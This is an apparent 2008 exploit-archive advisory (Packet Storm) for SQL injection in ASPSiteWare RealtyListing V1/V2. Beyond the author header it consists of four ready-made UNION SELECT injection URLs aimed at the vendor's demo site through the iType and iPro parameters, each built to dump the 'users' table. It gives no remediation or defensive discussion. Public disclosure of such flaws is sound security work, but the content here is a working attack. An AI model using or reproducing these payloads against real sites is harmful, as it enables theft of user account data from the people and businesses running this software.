ASPSiteWare RealtyListing SQL Injection

2008-12-15T00:00:00
ID PACKETSTORM:72994
Type packetstorm
Reporter AlpHaNiX
Modified 2008-12-15T00:00:00

Description

                                        
                                            `###########################################################################  
#-------------------------------AlpHaNiX----------------------------------#  
###########################################################################  
  
#Found By : AlpHaNiX  
#website : www.offensivetrack.org  
#contact : AlpHa[AT]HACKER[DOT]BZ  
  
###########################################################################  
  
#script : RealtyListing V1/V2  
#download : null  
#Demo : http://www.aspsiteware.com/Realty1  
http://www.aspsiteware.com/realty2/realty2/  
  
  
###########################################################################  
  
#Exploits :  
  
--=[SQL INJECTION]=--  
http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#  
http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#  
http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users  
http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users  
  
  
###########################################################################  
  
  
`